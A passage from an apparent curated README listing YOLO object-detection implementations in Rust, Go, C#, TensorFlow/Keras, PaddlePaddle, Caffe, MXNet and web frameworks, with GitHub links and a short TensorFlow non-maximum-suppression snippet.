  - [AndreyGermanov/yolov8_onnx_rust](https://github.com/AndreyGermanov/yolov8_onnx_rust) <img src="https://img.shields.io/github/stars/AndreyGermanov/yolov8_onnx_rust?style=social"/> : YOLOv8 inference using Rust.
  - [igor-yusupov/rusty-yolo](https://github.com/igor-yusupov/rusty-yolo) <img src="https://img.shields.io/github/stars/igor-yusupov/rusty-yolo?style=social"/> : rusty-yolo.
  - [gsuyemoto/yolo-rust](https://github.com/gsuyemoto/yolo-rust) <img src="https://img.shields.io/github/stars/gsuyemoto/yolo-rust?style=social"/> : Run YOLO computer vision model using Rust and OpenCV and/or Torch.
  - [alianse777/darknet-rust](https://github.com/alianse777/darknet-rust) <img src="https://img.shields.io/github/stars/alianse777/darknet-rust?style=social"/> : A Rust wrapper for Darknet, an open source neural network framework written in C and CUDA. [pjreddie.com/darknet/](https://pjreddie.com/darknet/)
  - [12101111/yolo-rs](https://github.com/12101111/yolo-rs) <img src="https://img.shields.io/github/stars/12101111/yolo-rs?style=social"/> : Yolov3 & Yolov4 with TVM and Rust.
  - [TKGgunter/yolov4_tiny_rs](https://github.com/TKGgunter/yolov4_tiny_rs) <img src="https://img.shields.io/github/stars/TKGgunter/yolov4_tiny_rs?style=social"/> : A Rust implementation of the yolov4_tiny algorithm.
  - [flixstn/You-Only-Look-Once](https://github.com/flixstn/You-Only-Look-Once) <img src="https://img.shields.io/github/stars/flixstn/You-Only-Look-Once?style=social"/> : A Rust implementation of Yolo for object detection and tracking.
  - [lenna-project/yolo-plugin](https://github.com/lenna-project/yolo-plugin) <img src="https://img.shields.io/github/stars/lenna-project/yolo-plugin?style=social"/> : Yolo Object Detection Plugin for Lenna.
  - [laclouis5/globox-rs](https://github.com/laclouis5/globox-rs) <img src="https://img.shields.io/github/stars/laclouis5/globox-rs?style=social"/> : Object detection toolbox for parsing, converting and evaluating bounding box annotations.
  - [metobom/tchrs-opencv-webcam-inference](https://github.com/metobom/tchrs-opencv-webcam-inference) <img src="https://img.shields.io/github/stars/metobom/tchrs-opencv-webcam-inference?style=social"/> : This example shows steps for running a Python-trained model on a webcam feed with OpenCV and tch-rs. The model runs on GPU.

- ### Go Implementation

  - [LdDl/go-darknet](https://github.com/LdDl/go-darknet) <img src="https://img.shields.io/github/stars/LdDl/go-darknet?style=social"/> : go-darknet: Go bindings for Darknet (Yolo V4, Yolo V7-tiny, Yolo V3).
  - [adalkiran/distributed-inference](https://github.com/adalkiran/distributed-inference) <img src="https://img.shields.io/github/stars/adalkiran/distributed-inference?style=social"/> : Cross-language and distributed deep learning inference pipeline for WebRTC video streams over Redis Streams. Currently supports the YOLOX model, which runs well on CPU.
  - [wimspaargaren/yolov3](https://github.com/wimspaargaren/yolov3) <img src="https://img.shields.io/github/stars/wimspaargaren/yolov3?style=social"/> : Go implementation of the yolo v3 object detection system.
  - [wimspaargaren/yolov5](https://github.com/wimspaargaren/yolov5) <img src="https://img.shields.io/github/stars/wimspaargaren/yolov5?style=social"/> : Go implementation of the yolo v5 object detection system.
  - [genert/real_time_object_detection_go](https://github.com/genert/real_time_object_detection_go) <img src="https://img.shields.io/github/stars/genert/real_time_object_detection_go?style=social"/> : Real Time Object Detection with OpenCV, Go, and Yolo v4.

- ### CSharp Implementation

  - [ML.NET](https://github.com/dotnet/machinelearning) <img src="https://img.shields.io/github/stars/dotnet/machinelearning?style=social"/> : ML.NET is an open source and cross-platform machine learning framework for .NET.
  - [TorchSharp](https://github.com/dotnet/TorchSharp) <img src="https://img.shields.io/github/stars/dotnet/TorchSharp?style=social"/> : A .NET library that provides access to the library that powers PyTorch.
  - [TensorFlow.NET](https://github.com/SciSharp/TensorFlow.NET) <img src="https://img.shields.io/github/stars/SciSharp/TensorFlow.NET?style=social"/> : .NET Standard bindings for Google's TensorFlow for developing, training and deploying Machine Learning models in C# and F#.
  - [DlibDotNet](https://github.com/takuya-takeuchi/DlibDotNet) <img src="https://img.shields.io/github/stars/takuya-takeuchi/DlibDotNet?style=social"/> : Dlib .NET wrapper written in C++ and C# for Windows, macOS, Linux and iOS.
  - [DiffSharp](https://github.com/DiffSharp/DiffSharp) <img src="https://img.shields.io/github/stars/DiffSharp/DiffSharp?style=social"/> : DiffSharp: Differentiable Functional Programming.
  - [dme-compunet/YOLOv8](https://github.com/dme-compunet/YOLOv8) <img src="https://img.shields.io/github/stars/dme-compunet/YOLOv8?style=social"/> : Use YOLOv8 in real-time, for object detection, instance segmentation, pose estimation and image classification, via ONNX Runtime.
  - [techwingslab/yolov5-net](https://github.com/techwingslab/yolov5-net) <img src="https://img.shields.io/github/stars/techwingslab/yolov5-net?style=social"/> : YOLOv5 object detection with C#, ML.NET, ONNX.
  - [sstainba/Yolov8.Net](https://github.com/sstainba/Yolov8.Net) <img src="https://img.shields.io/github/stars/sstainba/Yolov8.Net?style=social"/> : A .NET 6 implementation to use Yolov5 and Yolov8 models via the ONNX Runtime.
  - [Alturos.Yolo](https://github.com/AlturosDestinations/Alturos.Yolo) <img src="https://img.shields.io/github/stars/AlturosDestinations/Alturos.Yolo?style=social"/> : C# Yolo Darknet Wrapper (real-time object detection).
  - [ivilson/Yolov7net](https://github.com/ivilson/Yolov7net) <img src="https://img.shields.io/github/stars/ivilson/Yolov7net?style=social"/> : Yolov7 Detector for .NET 6.
  - [sangyuxiaowu/ml_yolov7](https://github.com/sangyuxiaowu/ml_yolov7) <img src="https://img.shields.io/github/stars/sangyuxiaowu/ml_yolov7?style=social"/> : ML.NET Yolov7. WeChat official account "ๆก‘ๆฆ†่‚–็‰ฉ": "[Detecting objects with YOLOv7 and ONNX in ML.NET](https://mp.weixin.qq.com/s/vXz6gavYJR2mh5KuJO_slA)"
  - [keijiro/TinyYOLOv2Barracuda](https://github.com/keijiro/TinyYOLOv2Barracuda) <img src="https://img.shields.io/github/stars/keijiro/TinyYOLOv2Barracuda?style=social"/> : Tiny YOLOv2 on Unity Barracuda.
  - [derenlei/Unity_Detection2AR](https://github.com/derenlei/Unity_Detection2AR) <img src="https://img.shields.io/github/stars/derenlei/Unity_Detection2AR?style=social"/> : Localize 2D image object detection in 3D Scene with Yolo in Unity Barracuda and ARFoundation.
  - [died/YOLO3-With-OpenCvSharp4](https://github.com/died/YOLO3-With-OpenCvSharp4) <img src="https://img.shields.io/github/stars/died/YOLO3-With-OpenCvSharp4?style=social"/> : Demo of implementing YOLO v3 with OpenCvSharp v4 in C#.
  - [mbaske/yolo-unity](https://github.com/mbaske/yolo-unity) <img src="https://img.shields.io/github/stars/mbaske/yolo-unity?style=social"/> : YOLO In-Game Object Detection for Unity (Windows).
  - [BobLd/YOLOv4MLNet](https://github.com/BobLd/YOLOv4MLNet) <img src="https://img.shields.io/github/stars/BobLd/YOLOv4MLNet?style=social"/> : Use the YOLO v4 and v5 (ONNX) models for object detection in C# using ML.Net.
  - [keijiro/YoloV4TinyBarracuda](https://github.com/keijiro/YoloV4TinyBarracuda) <img src="https://img.shields.io/github/stars/keijiro/YoloV4TinyBarracuda?style=social"/> : YoloV4TinyBarracuda is an implementation of the YOLOv4-tiny object detection model on the Unity Barracuda neural network inference library.
  - [zhang8043/YoloWrapper](https://github.com/zhang8043/YoloWrapper) <img src="https://img.shields.io/github/stars/zhang8043/YoloWrapper?style=social"/> : A C# wrapper around the YOLOv4 algorithm for object detection.
  - [maalik0786/FastYolo](https://github.com/maalik0786/FastYolo) <img src="https://img.shields.io/github/stars/maalik0786/FastYolo?style=social"/> : Fast Yolo for fast initializing, object detection and tracking.
  - [Uehwan/CSharp-Yolo-Video](https://github.com/Uehwan/CSharp-Yolo-Video) <img src="https://img.shields.io/github/stars/Uehwan/CSharp-Yolo-Video?style=social"/> : C# Yolo for Video.
  - [HTTP123-A/HumanDetection_Yolov5NET](https://github.com/HTTP123-A/HumanDetection_Yolov5NET) <img src="https://img.shields.io/github/stars/HTTP123-A/HumanDetection_Yolov5NET?style=social"/> : YOLOv5 object detection with ML.NET, ONNX.
  - [Celine-Hsieh/Hand_Gesture_Training--yolov4](https://github.com/Celine-Hsieh/Hand_Gesture_Training--yolov4) <img src="https://img.shields.io/github/stars/Celine-Hsieh/Hand_Gesture_Training--yolov4?style=social"/> : Recognize the gestures' features using the YOLOv4 algorithm.
  - [lin-tea/YOLOv5DetectionWithCSharp](https://github.com/lin-tea/YOLOv5DetectionWithCSharp) <img src="https://img.shields.io/github/stars/lin-tea/YOLOv5DetectionWithCSharp?style=social"/> : YOLOv5s inference in C# and training in Python.
  - [MirCore/Unity-Object-Detection-and-Localization-with-VR](https://github.com/MirCore/Unity-Object-Detection-and-Localization-with-VR) <img src="https://img.shields.io/github/stars/MirCore/Unity-Object-Detection-and-Localization-with-VR?style=social"/> : Detect and localize objects from the front-facing camera image of a VR Headset in a 3D Scene in Unity using Yolo and Barracuda.
  - [CarlAreDHopen-eaton/YoloObjectDetection](https://github.com/CarlAreDHopen-eaton/YoloObjectDetection) <img src="https://img.shields.io/github/stars/CarlAreDHopen-eaton/YoloObjectDetection?style=social"/> : Yolo Object Detection Application for RTSP streams.
  - [TimothyMeadows/Yolo6.NetCore](https://github.com/TimothyMeadows/Yolo6.NetCore) <img src="https://img.shields.io/github/stars/TimothyMeadows/Yolo6.NetCore?style=social"/> : You Only Look Once (v6) for .NET Core LTS.
  - [mwetzko/EasyYoloDarknet](https://github.com/mwetzko/EasyYoloDarknet) <img src="https://img.shields.io/github/stars/mwetzko/EasyYoloDarknet?style=social"/> : Windows-optimized Yolo / Darknet compile, train and detect.
  - [cj-mills/Unity-OpenVINO-YOLOX](https://github.com/cj-mills/Unity-OpenVINO-YOLOX) <img src="https://img.shields.io/github/stars/cj-mills/Unity-OpenVINO-YOLOX?style=social"/> : This tutorial series covers how to perform object detection in the Unity game engine with the OpenVINOโ„ข Toolkit.
  - [natml-hub/YOLOX](https://github.com/natml-hub/YOLOX) <img src="https://img.shields.io/github/stars/natml-hub/YOLOX?style=social"/> : High performance object detector based on YOLO series.
  - [thisistherealdiana/YOLO_project](https://github.com/thisistherealdiana/YOLO_project) <img src="https://img.shields.io/github/stars/thisistherealdiana/YOLO_project?style=social"/> : YOLO project made by Diana Kereselidze.
  - [oujunke/Yolo5Net](https://github.com/oujunke/Yolo5Net) <img src="https://img.shields.io/github/stars/oujunke/Yolo5Net?style=social"/> : Yolo5 implemented in TensorFlow.NET.
  - [wojciechp6/YOLO-UnityBarracuda](https://github.com/wojciechp6/YOLO-UnityBarracuda) <img src="https://img.shields.io/github/stars/wojciechp6/YOLO-UnityBarracuda?style=social"/> : Object detection app built on Unity Barracuda and YOLOv2 Tiny.
  - [RaminAbbaszadi/YoloWrapper-WPF](https://github.com/RaminAbbaszadi/YoloWrapper-WPF) <img src="https://img.shields.io/github/stars/RaminAbbaszadi/YoloWrapper-WPF?style=social"/> : WPF (C#) Yolo Darknet Wrapper.
  - [fengyhack/YoloWpf](https://github.com/fengyhack/YoloWpf) <img src="https://img.shields.io/github/stars/fengyhack/YoloWpf?style=social"/> : GUI demo for Object Detection with YOLO and OpenCVSharp.
  - [hanzhuang111/Yolov5Wpf](https://github.com/hanzhuang111/Yolov5Wpf) <img src="https://img.shields.io/github/stars/hanzhuang111/Yolov5Wpf?style=social"/> : Deploy a YOLOV5 ONNX model with ML.NET.
  - [MaikoKingma/yolo-winforms-test](https://github.com/MaikoKingma/yolo-winforms-test) <img src="https://img.shields.io/github/stars/MaikoKingma/yolo-winforms-test?style=social"/> : A Windows Forms application that can execute pre-trained object detection models via ML.NET; in this instance the You Only Look Once version 4 (yolov4) is used.
  - [SeanAnd/WebcamObjectDetection](https://github.com/SeanAnd/WebcamObjectDetection) <img src="https://img.shields.io/github/stars/SeanAnd/WebcamObjectDetection?style=social"/> : YOLO object detection using webcam in winforms.
  - [Devmawi/BlazorObjectDetection-Sample](https://github.com/Devmawi/BlazorObjectDetection-Sample) <img src="https://img.shields.io/github/stars/Devmawi/BlazorObjectDetection-Sample?style=social"/> : Simple project for demonstrating how to embed a continuously object detection with Yolo on a video in a hybrid Blazor app (WebView2).
  - [Soju06/yolov5-annotation-viewer](https://github.com/Soju06/yolov5-annotation-viewer) <img src="https://img.shields.io/github/stars/Soju06/yolov5-annotation-viewer?style=social"/> : yolov5 annotation viewer.
  - [developer-ken/YoloPredictorMLDotNet](https://github.com/developer-ken/YoloPredictorMLDotNet) <img src="https://img.shields.io/github/stars/developer-ken/YoloPredictorMLDotNet?style=social"/> : YoloPredictorMLDotNet.
  - [LionelC-Kyo/CSharp_YoloV5_Torch](https://github.com/LionelC-Kyo/CSharp_YoloV5_Torch) <img src="https://img.shields.io/github/stars/LionelC-Kyo/CSharp_YoloV5_Torch?style=social"/> : Run Yolo V5 in C# via Torch.
  - [wanglvhang/OnnxYoloDemo](https://github.com/wanglvhang/OnnxYoloDemo) <img src="https://img.shields.io/github/stars/wanglvhang/OnnxYoloDemo?style=social"/> : Demo of using C# to run a YOLO ONNX model with ONNX Runtime; contains a Windows capture tool to grab bitmaps from the desktop and from windows.
  - [BobLd/YOLOv3MLNet](https://github.com/BobLd/YOLOv3MLNet) <img src="https://img.shields.io/github/stars/BobLd/YOLOv3MLNet?style=social"/> : Use the YOLO v3 (ONNX) model for object detection in C# using ML.Net.
  - [zgabi/Yolo.Net](https://github.com/zgabi/Yolo.Net) <img src="https://img.shields.io/github/stars/zgabi/Yolo.Net?style=social"/> : zgabi/Yolo.Net
  - [aliardan/RoadMarkingDetection](https://github.com/aliardan/RoadMarkingDetection) <img src="https://img.shields.io/github/stars/aliardan/RoadMarkingDetection?style=social"/> : Road markings detection using yolov5 model based on ONNX.
  - [TimothyMeadows/Yolo5.NetCore](https://github.com/TimothyMeadows/Yolo5.NetCore) <img src="https://img.shields.io/github/stars/TimothyMeadows/Yolo5.NetCore?style=social"/> : You Only Look Once (v5) for .NET Core LTS.
  - [AD-HO/YOLOv5-ML.NET](https://github.com/AD-HO/YOLOv5-ML.NET) <img src="https://img.shields.io/github/stars/AD-HO/YOLOv5-ML.NET?style=social"/> : Inferencing Yolov5 ONNX model using ML.NET and ONNX Runtime.
  - [ToxicSkill/YOLOV7-Webcam-inference](https://github.com/ToxicSkill/YOLOV7-Webcam-inference) <img src="https://img.shields.io/github/stars/ToxicSkill/YOLOV7-Webcam-inference?style=social"/> : Simple WPF program for webcam inference with YOLOv7 models.
  - [rabbitsun2/csharp_and_microsoft_ml_and_yolo_v5_sample](https://github.com/rabbitsun2/csharp_and_microsoft_ml_and_yolo_v5_sample) <img src="https://img.shields.io/github/stars/rabbitsun2/csharp_and_microsoft_ml_and_yolo_v5_sample?style=social"/> : A project tying together C#, Microsoft ML, Yolo v5, Microsoft ML.DNN and OpenCVSharp4.
  - [hsysfan/YOLOv5-Seg-OnnxRuntime](https://github.com/hsysfan/YOLOv5-Seg-OnnxRuntime) <img src="https://img.shields.io/github/stars/hsysfan/YOLOv5-Seg-OnnxRuntime?style=social"/> : YOLOv5 segmentation implementation in C# and OnnxRuntime.

- ### Tensorflow and Keras Implementation

  - [YunYang1994/tensorflow-yolov3](https://github.com/YunYang1994/tensorflow-yolov3) <img src="https://img.shields.io/github/stars/YunYang1994/tensorflow-yolov3?style=social"/> : ๐Ÿ”ฅ TensorFlow Code for technical report: "YOLOv3: An Incremental Improvement".
  - [zzh8829/yolov3-tf2](https://github.com/zzh8829/yolov3-tf2) <img src="https://img.shields.io/github/stars/zzh8829/yolov3-tf2?style=social"/> : YoloV3 Implemented in Tensorflow 2.0.
  - [hunglc007/tensorflow-yolov4-tflite](https://github.com/hunglc007/tensorflow-yolov4-tflite) <img src="https://img.shields.io/github/stars/hunglc007/tensorflow-yolov4-tflite?style=social"/> : YOLOv4, YOLOv4-tiny, YOLOv3, YOLOv3-tiny implemented in Tensorflow 2.0, Android. Convert YOLO v4 .weights to tensorflow, tensorrt and tflite.
  - [gliese581gg/YOLO_tensorflow](https://github.com/gliese581gg/YOLO_tensorflow) <img src="https://img.shields.io/github/stars/gliese581gg/YOLO_tensorflow?style=social"/> : tensorflow implementation of 'YOLO : Real-Time Object Detection'.
  - [llSourcell/YOLO_Object_Detection](https://github.com/llSourcell/YOLO_Object_Detection) <img src="https://img.shields.io/github/stars/llSourcell/YOLO_Object_Detection?style=social"/> : This is the code for "YOLO Object Detection" by Siraj Raval on Youtube.
  - [wizyoung/YOLOv3_TensorFlow](https://github.com/wizyoung/YOLOv3_TensorFlow) <img src="https://img.shields.io/github/stars/wizyoung/YOLOv3_TensorFlow?style=social"/> : Complete YOLO v3 TensorFlow implementation. Support training on your own dataset.
  - [theAIGuysCode/yolov4-deepsort](https://github.com/theAIGuysCode/yolov4-deepsort) <img src="https://img.shields.io/github/stars/theAIGuysCode/yolov4-deepsort?style=social"/> : Object tracking implemented with YOLOv4, DeepSort, and TensorFlow.
  - [mystic123/tensorflow-yolo-v3](https://github.com/mystic123/tensorflow-yolo-v3) <img src="https://img.shields.io/github/stars/mystic123/tensorflow-yolo-v3?style=social"/> : Implementation of YOLO v3 object detector in Tensorflow (TF-Slim).
  - [hizhangp/yolo_tensorflow](https://github.com/hizhangp/yolo_tensorflow) <img src="https://img.shields.io/github/stars/hizhangp/yolo_tensorflow?style=social"/> : Tensorflow implementation of YOLO, including training and test phase.
  - [nilboy/tensorflow-yolo](https://github.com/nilboy/tensorflow-yolo) <img src="https://img.shields.io/github/stars/nilboy/tensorflow-yolo?style=social"/> : tensorflow implementation of 'YOLO : Real-Time Object Detection' (train and test).
  - [qqwweee/keras-yolo3](https://github.com/qqwweee/keras-yolo3) <img src="https://img.shields.io/github/stars/qqwweee/keras-yolo3?style=social"/> : A Keras implementation of YOLOv3 (Tensorflow backend).
  - [allanzelener/YAD2K](https://github.com/allanzelener/YAD2K) <img src="https://img.shields.io/github/stars/allanzelener/YAD2K?style=social"/> : YAD2K: Yet Another Darknet 2 Keras.
  - [experiencor/keras-yolo2](https://github.com/experiencor/keras-yolo2) <img src="https://img.shields.io/github/stars/experiencor/keras-yolo2?style=social"/> : YOLOv2 in Keras and Applications.
  - [experiencor/keras-yolo3](https://github.com/experiencor/keras-yolo3) <img src="https://img.shields.io/github/stars/experiencor/keras-yolo3?style=social"/> : Training and Detecting Objects with YOLO3.
  - [SpikeKing/keras-yolo3-detection](https://github.com/SpikeKing/keras-yolo3-detection) <img src="https://img.shields.io/github/stars/SpikeKing/keras-yolo3-detection?style=social"/> : The YOLO v3 object detection algorithm.
  - [xiaochus/YOLOv3](https://github.com/xiaochus/YOLOv3) <img src="https://img.shields.io/github/stars/xiaochus/YOLOv3?style=social"/> : Keras implementation of yolo v3 object detection.
  - [bubbliiiing/yolo3-keras](https://github.com/bubbliiiing/yolo3-keras) <img src="https://img.shields.io/github/stars/bubbliiiing/yolo3-keras?style=social"/> : The source code of yolo3-keras; it can be used to train your own model.
  - [bubbliiiing/yolov4-keras](https://github.com/bubbliiiing/yolov4-keras) <img src="https://img.shields.io/github/stars/bubbliiiing/yolov4-keras?style=social"/> : The source code of YoloV4-keras; it can be used to train your own model.
  - [bubbliiiing/yolov4-tf2](https://github.com/bubbliiiing/yolov4-tf2) <img src="https://img.shields.io/github/stars/bubbliiiing/yolov4-tf2?style=social"/> : The source code of yolo4-tf2 (tensorflow2); it can be used to train your own model.
  - [bubbliiiing/yolov4-tiny-tf2](https://github.com/bubbliiiing/yolov4-tiny-tf2) <img src="https://img.shields.io/github/stars/bubbliiiing/yolov4-tiny-tf2?style=social"/> : The source code of YoloV4-tiny-tf2; it can be used to train your own model.
  - [pythonlessons/TensorFlow-2.x-YOLOv3](https://github.com/pythonlessons/TensorFlow-2.x-YOLOv3) <img src="https://img.shields.io/github/stars/pythonlessons/TensorFlow-2.x-YOLOv3?style=social"/> : YOLOv3 implementation in TensorFlow 2.3.1.
  - [miemie2013/Keras-YOLOv4](https://github.com/miemie2013/Keras-YOLOv4) <img src="https://img.shields.io/github/stars/miemie2013/Keras-YOLOv4?style=social"/> : PPYOLO AND YOLOv4.
  - [Ma-Dan/keras-yolo4](https://github.com/Ma-Dan/keras-yolo4) <img src="https://img.shields.io/github/stars/Ma-Dan/keras-yolo4?style=social"/> : A Keras implementation of YOLOv4 (Tensorflow backend).
  - [miranthajayatilake/YOLOw-Keras](https://github.com/miranthajayatilake/YOLOw-Keras) <img src="https://img.shields.io/github/stars/miranthajayatilake/YOLOw-Keras?style=social"/> : YOLOv2 Object Detection w/ Keras (in just 20 lines of code).
  - [maiminh1996/YOLOv3-tensorflow](https://github.com/maiminh1996/YOLOv3-tensorflow) <img src="https://img.shields.io/github/stars/maiminh1996/YOLOv3-tensorflow?style=social"/> : Re-implement YOLOv3 with TensorFlow.
  - [Stick-To/Object-Detection-Tensorflow](https://github.com/Stick-To/Object-Detection-Tensorflow) <img src="https://img.shields.io/github/stars/Stick-To/Object-Detection-Tensorflow?style=social"/> : Object Detection API Tensorflow.
  - [avBuffer/Yolov5_tf](https://github.com/avBuffer/Yolov5_tf) <img src="https://img.shields.io/github/stars/avBuffer/Yolov5_tf?style=social"/> : Yolov5/Yolov4/Yolov3/Yolo_tiny in tensorflow.
  - [ruiminshen/yolo-tf](https://github.com/ruiminshen/yolo-tf) <img src="https://img.shields.io/github/stars/ruiminshen/yolo-tf?style=social"/> : TensorFlow implementation of the YOLO (You Only Look Once).
  - [xiao9616/yolo4_tensorflow2](https://github.com/xiao9616/yolo4_tensorflow2) <img src="https://img.shields.io/github/stars/xiao9616/yolo4_tensorflow2?style=social"/> : YOLO 4th edition implemented with tensorflow2.0.
  - [sicara/tf2-yolov4](https://github.com/sicara/tf2-yolov4) <img src="https://img.shields.io/github/stars/sicara/tf2-yolov4?style=social"/> : A TensorFlow 2.0 implementation of YOLOv4: Optimal Speed and Accuracy of Object Detection.
  - [LongxingTan/Yolov5](https://github.com/LongxingTan/Yolov5) <img src="https://img.shields.io/github/stars/LongxingTan/Yolov5?style=social"/> : Efficient implementation of YOLOV5 in TensorFlow2.
  - [geekjr/quickai](https://github.com/geekjr/quickai) <img src="https://img.shields.io/github/stars/geekjr/quickai?style=social"/> : QuickAI is a Python library that makes it extremely easy to experiment with state-of-the-art Machine Learning models.
  - [CV_Lab/yolov5_rt_tfjs](https://gitee.com/CV_Lab/yolov5_rt_tfjs) : ๐Ÿš€ A real-time YOLOv5 object detection project based on TensorFlow.js.
  - [Burf/TFDetection](https://github.com/Burf/TFDetection) <img src="https://img.shields.io/github/stars/Burf/TFDetection?style=social"/> : A detection toolbox for Tensorflow2.
  - [taipingeric/yolo-v4-tf.keras](https://github.com/taipingeric/yolo-v4-tf.keras) <img src="https://img.shields.io/github/stars/taipingeric/yolo-v4-tf.keras?style=social"/> : A simple tf.keras implementation of YOLO v4.
  - [david8862/keras-YOLOv3-model-set](https://github.com/david8862/keras-YOLOv3-model-set) <img src="https://img.shields.io/github/stars/david8862/keras-YOLOv3-model-set?style=social"/> : end-to-end YOLOv4/v3/v2 object detection pipeline, implemented on tf.keras with different technologies.
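Most of the TensorFlow/Keras ports above end with the same post-processing step: non-maximum suppression over decoded boxes. A minimal sketch of that final stage using TensorFlow's built-in NMS op; random tensors stand in for real decoded model output:

```python
import tensorflow as tf

# Stand-ins for decoded detector output: 100 candidate boxes built from
# two random corner points each, sorted so rows read [y1, x1, y2, x2].
pts = tf.random.uniform((100, 2, 2))
boxes = tf.concat([tf.reduce_min(pts, axis=1), tf.reduce_max(pts, axis=1)], axis=1)
scores = tf.random.uniform((100,))

# Keep at most 20 boxes, suppressing overlaps above 0.45 IoU and
# dropping anything below 0.25 confidence.
keep = tf.image.non_max_suppression(
    boxes, scores, max_output_size=20, iou_threshold=0.45, score_threshold=0.25
)

final_boxes = tf.gather(boxes, keep)
final_scores = tf.gather(scores, keep)
print(final_boxes.shape, final_scores.shape)
```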
- ### PaddlePaddle Implementation

  - [PaddlePaddle/PaddleDetection](https://github.com/PaddlePaddle/PaddleDetection) <img src="https://img.shields.io/github/stars/PaddlePaddle/PaddleDetection?style=social"/> : Object Detection toolkit based on PaddlePaddle. "PP-YOLO: An Effective and Efficient Implementation of Object Detector". (**[arXiv 2020](https://arxiv.org/abs/2007.12099)**)
  - [nemonameless/PaddleDetection_YOLOv5](https://github.com/nemonameless/PaddleDetection_YOLOv5) <img src="https://img.shields.io/github/stars/nemonameless/PaddleDetection_YOLOv5?style=social"/> : YOLOv5 of PaddleDetection, Paddle implementation of YOLOv5.
  - [nemonameless/PaddleDetection_YOLOX](https://github.com/nemonameless/PaddleDetection_YOLOX) <img src="https://img.shields.io/github/stars/nemonameless/PaddleDetection_YOLOX?style=social"/> : Paddle YOLOX, 51.8% on COCO val by YOLOX-x, 44.6% on YOLOX-ConvNeXt-s.
  - [nemonameless/PaddleDetection_YOLOset](https://github.com/nemonameless/PaddleDetection_YOLOset) <img src="https://img.shields.io/github/stars/nemonameless/PaddleDetection_YOLOset?style=social"/> : Paddle YOLO set: YOLOv3, PPYOLO, PPYOLOE, YOLOX, YOLOv5, YOLOv7 and so on.
  - [miemie2013/Paddle-YOLOv4](https://github.com/miemie2013/Paddle-YOLOv4) <img src="https://img.shields.io/github/stars/miemie2013/Paddle-YOLOv4?style=social"/> : Paddle-YOLOv4.
  - [Sharpiless/PaddleDetection-Yolov5](https://github.com/Sharpiless/PaddleDetection-Yolov5) <img src="https://img.shields.io/github/stars/Sharpiless/PaddleDetection-Yolov5?style=social"/> : A PaddlePaddle re-implementation of yolov5 that supports the PaddleDetection interface.
  - [Nioolek/PPYOLOE_pytorch](https://github.com/Nioolek/PPYOLOE_pytorch) <img src="https://img.shields.io/github/stars/Nioolek/PPYOLOE_pytorch?style=social"/> : An unofficial Pytorch implementation of PP-YOLOE, based on the Megvii YOLOX training code.

- ### Caffe Implementation

  - [ChenYingpeng/caffe-yolov3](https://github.com/ChenYingpeng/caffe-yolov3) <img src="https://img.shields.io/github/stars/ChenYingpeng/caffe-yolov3?style=social"/> : A real-time object detection framework for Yolov3/v4 based on caffe.
  - [ChenYingpeng/darknet2caffe](https://github.com/ChenYingpeng/darknet2caffe) <img src="https://img.shields.io/github/stars/ChenYingpeng/darknet2caffe?style=social"/> : Convert darknet weights to caffemodel.
  - [eric612/Caffe-YOLOv3-Windows](https://github.com/eric612/Caffe-YOLOv3-Windows) <img src="https://img.shields.io/github/stars/eric612/Caffe-YOLOv3-Windows?style=social"/> : A Windows caffe implementation of the YOLO detection network.
  - [Harick1/caffe-yolo](https://github.com/Harick1/caffe-yolo) <img src="https://img.shields.io/github/stars/Harick1/caffe-yolo?style=social"/> : Caffe for YOLO.
  - [choasup/caffe-yolo9000](https://github.com/choasup/caffe-yolo9000) <img src="https://img.shields.io/github/stars/choasup/caffe-yolo9000?style=social"/> : Caffe for YOLOv2 & YOLO9000.
  - [gklz1982/caffe-yolov2](https://github.com/gklz1982/caffe-yolov2) <img src="https://img.shields.io/github/stars/gklz1982/caffe-yolov2?style=social"/> : caffe-yolov2.

- ### MXNet Implementation

  - [Gluon CV Toolkit](https://github.com/dmlc/gluon-cv) <img src="https://img.shields.io/github/stars/dmlc/gluon-cv?style=social"/> : GluonCV provides implementations of the state-of-the-art (SOTA) deep learning models in computer vision.
  - [zhreshold/mxnet-yolo](https://github.com/zhreshold/mxnet-yolo) <img src="https://img.shields.io/github/stars/zhreshold/mxnet-yolo?style=social"/> : YOLO: You only look once real-time object detector.

- ### Web Implementation

  - [ModelDepot/tfjs-yolo-tiny](https://github.com/ModelDepot/tfjs-yolo-tiny) <img src="https://img.shields.io/github/stars/ModelDepot/tfjs-yolo-tiny?style=social"/> : In-Browser Object Detection using Tiny YOLO on Tensorflow.js.
  - [justadudewhohacks/tfjs-tiny-yolov2](https://github.com/justadudewhohacks/tfjs-tiny-yolov2) <img src="https://img.shields.io/github/stars/justadudewhohacks/tfjs-tiny-yolov2?style=social"/> : Tiny YOLO v2 object detection with tensorflow.js.
  - [reu2018DL/YOLO-LITE](https://github.com/reu2018DL/YOLO-LITE) <img src="https://img.shields.io/github/stars/reu2018DL/YOLO-LITE?style=social"/> : YOLO-LITE is a web implementation of YOLOv2-tiny.
  - [mobimeo/node-yolo](https://github.com/mobimeo/node-yolo) <img src="https://img.shields.io/github/stars/mobimeo/node-yolo?style=social"/> : Node bindings for YOLO/Darknet image recognition library.
  - [Sharpiless/Yolov5-Flask-VUE](https://github.com/Sharpiless/Yolov5-Flask-VUE) <img src="https://img.shields.io/github/stars/Sharpiless/Yolov5-Flask-VUE?style=social"/> : Deploy a YOLOv5 object detection model on the web, with a Flask backend and a VUE frontend.
  - [shaqian/tfjs-yolo](https://github.com/shaqian/tfjs-yolo) <img src="https://img.shields.io/github/stars/shaqian/tfjs-yolo?style=social"/> : YOLO v3 and Tiny YOLO v1, v2, v3 with Tensorflow.js.
  - [zqingr/tfjs-yolov3](https://github.com/zqingr/tfjs-yolov3) <img src="https://img.shields.io/github/stars/zqingr/tfjs-yolov3?style=social"/> : A Tensorflow js implementation of YOLOv3 and YOLOv3-tiny.
  - [bennetthardwick/darknet.js](https://github.com/bennetthardwick/darknet.js) <img src="https://img.shields.io/github/stars/bennetthardwick/darknet.js?style=social"/> : A NodeJS wrapper of pjreddie's darknet / yolo.
  - [nihui/ncnn-webassembly-yolov5](https://github.com/nihui/ncnn-webassembly-yolov5) <img src="https://img.shields.io/github/stars/nihui/ncnn-webassembly-yolov5?style=social"/> : Deploy YOLOv5 in your web browser with ncnn and webassembly.
  - [muhk01/Yolov5-on-Flask](https://github.com/muhk01/Yolov5-on-Flask) <img src="https://img.shields.io/github/stars/muhk01/Yolov5-on-Flask?style=social"/> : Running YOLOv5 through web browser using Flask microframework.
